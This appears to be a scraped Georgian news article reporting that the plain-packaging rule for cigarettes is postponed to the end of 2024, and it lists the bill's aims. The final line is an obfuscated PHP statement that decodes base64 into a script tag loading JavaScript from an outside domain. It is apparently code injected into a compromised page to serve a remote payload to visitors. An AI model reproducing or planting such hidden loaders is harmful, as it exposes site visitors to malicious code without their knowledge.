celsiusi
ავერსი საქკაბელი
ყველა ტიპის სიგარეტის ერთნაირი კოლოფით გაყიდვის ვალდებულება კომპანიებს 2022 წლის 31 დეკემბრის ნაცვლად, 2024 წლის 31 დეკემბრიდან ექნებათ. ამის შესახებ პარლამენტის ადამიანის უფლებათა დაცვისა და სამოქალაქო ინტეგრაციის კომიტეტმა უკვე იმსჯელა. 
 
კანონპროექტში ნათქვამია, რომ მისი მიზანია:
 
თამბაქოს ნაწარმის მიმზიდველობის შემცირება;
სამედიცინო გაფრთხილების ეფექტიანობისა და თვალსაჩინოების გაზრდა;
თამბაქოს ნაწარმის შეფუთვით თამბაქოს ნაწარმის ან მისი მოხმარების თაობაზე მომხმარებლის შეცდომაში შეყვანის შესაძლებლობის შემცირება.
ამისათვის ყველა ტიპის თამბაქოს კოლოფი იქნება ერთფეროვანი და აკრძალული იქნება ბრენდის, ლოგოს, სასაქონლო ნიშნის ან მისი აღმნიშვნელი სხვა ელემენტის გამოყენება.
 
კოლოფზე ბრენდების სახელები ერთნაირი, სტანდარტული შრიფტით იქნება დაწერილი, რათა გამყიდველსა და მომხმარებელს პროდუქტის იდენტიფიცირება არ გაუჭირდეთ. ამასთან ერთად, კოლოფზე მითითებული უნდა იყოს მწარმოებელი ქვეყანაც.
353
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");